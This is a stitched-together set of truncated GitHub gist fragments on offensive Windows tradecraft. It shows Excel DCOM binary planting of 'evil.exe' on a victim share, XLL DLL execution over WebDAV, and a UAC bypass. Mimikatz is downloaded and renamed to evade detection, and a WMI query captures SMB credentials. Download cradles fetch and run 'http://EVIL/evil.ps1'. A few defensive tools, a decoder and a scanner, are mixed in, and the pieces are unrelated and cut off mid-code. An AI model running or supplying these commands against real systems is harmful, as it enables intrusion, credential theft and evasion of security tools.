Quentin Grosperrin qgrosperrin
@rxwx
rxwx / foxprow.ps1
Last active September 14, 2017 15:06
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
@ryhanson
ryhanson / ExcelXLL.md
Last active March 29, 2024 05:27
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

import binascii
import sys

# Read the input file as raw bytes so the hex dump is not altered by text-mode newline translation
file_name = sys.argv[1]
with open(file_name, 'rb') as f:
    hexdata = binascii.hexlify(f.read())
# Pair up hex digits into one byte per entry
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
    shellcode += "0x{},".format(i)
@mattifestation
mattifestation / LoadMethodScanner.ps1
Last active December 12, 2023 10:05
A crude Load(byte[]) method scanner for UMCI bypass research
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]
anonymous
anonymous / psx.py
Created November 13, 2016 14:32
PowerShell decoder by @JohnLaTwC
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
## * base64 data which encode unicode, gzip, or deflate encoded strings
## * it can operate on a file or stdin
## * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@mubix
mubix / WMIQuery_SMBAuth.ps1
Created December 18, 2015 03:20
Using a WMI Query to be able to capture credentials
$share = "\\192.168.1.245\share"
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
Get-WmiObject -query $query
<#
Obtained using Impacket's SMBServer.py example
Attacker: 192.168.1.245
Victim: 192.168.1.100
Result:
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active May 4, 2024 08:16
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object